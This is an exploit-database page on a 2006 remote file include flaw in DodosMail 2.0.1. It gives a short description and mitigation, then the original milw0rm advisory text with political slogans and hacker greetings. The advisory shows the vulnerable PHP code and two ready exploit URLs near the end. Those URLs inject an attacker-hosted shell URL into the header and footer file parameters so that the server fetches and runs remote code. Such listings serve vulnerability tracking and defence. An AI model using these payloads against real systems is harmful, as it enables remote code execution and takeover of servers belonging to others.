DodosMail - exploit.company

vendor:

DodosMail

by:

CoLd Zero

7,5

CVSS

HIGH

Remote File Include Vulnerability

CWE

Product Name: DodosMail

Affected Version From: 2.0.1

Affected Version To: 2.0.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:regretless:dodosmail

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

DodosMail <= 2.0.1(dodosmail.php) Remote File Include Vulnerability

DodosMail 2.0.1 is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a malicious URL in the dodosmail_header_file and dodosmail_footer_file parameters of the dodosmail.php script. This will allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of DodosMail and ensure that all user input is properly sanitized.

Source

Exploit-DB raw data:

--------------------------------------||    Viva Palestine ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien ||-----------------------------------------


DodosMail <= 2.0.1(dodosmail.php)  Remote File Include Vulnerability



Found By  :  CoLd Zero  [ Wasem898 ]

Source    :  include_once ($4AZHAR_TeAM."Securty.");

            require ($SpECiALPowEr.oRg_TeAm."Securty");



PalesTine Arab Muslim Hacker

http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif


######################################################
#
#            DodosMail 2.0.1
#
# Class:     Remote File Include Vulnerability
# Published  2006-11-07
# Remote:    Yes
# Type:      dangerous
# Site:      http://regretless.com/scripts/scripts.php#dodosrangen
#
# Author:    Cold Zero
# Contact:   c.o.1.d.0@hotmail.com
#
######################################################

file ;

dodosmail.php

==========================

       include_dodosmail_header($dodosmail_header_file);
       echo "<p class=\"DodosMailError\">DodosMail Error - the owner the php server is experiencing techinical difficulties. Please email use ".dodosmail_error_handle($your_email_address)." to send your email.\n";
       echo "<br /><br /><a href=\"javascript:history.back(1)\">Back</a>\n";
       echo "</p>\n";
include_dodosmail_footer($dodosmail_footer_file);


======================================================

Exploit :

Http://www.Victem.0/[DodosMail_PaTH]/dodosmail.php?dodosmail_header_file=http://coldzero.shell
Http://www.Victem.0/[DodosMail_PaTH]/dodosmail.php?dodosmail_footer_file=http://coldzero.shell

======================================================

----  GreeTz: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell]
              [Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR]



#www.4azhar Team                >>      www.4azhar.com
#SpeciaL PoweR SecuritY TeaM    >>      www.specialpower.org



http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif


--------------------------------------||    Viva Palestine ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien ||-----------------------------------------

# milw0rm.com [2006-11-08]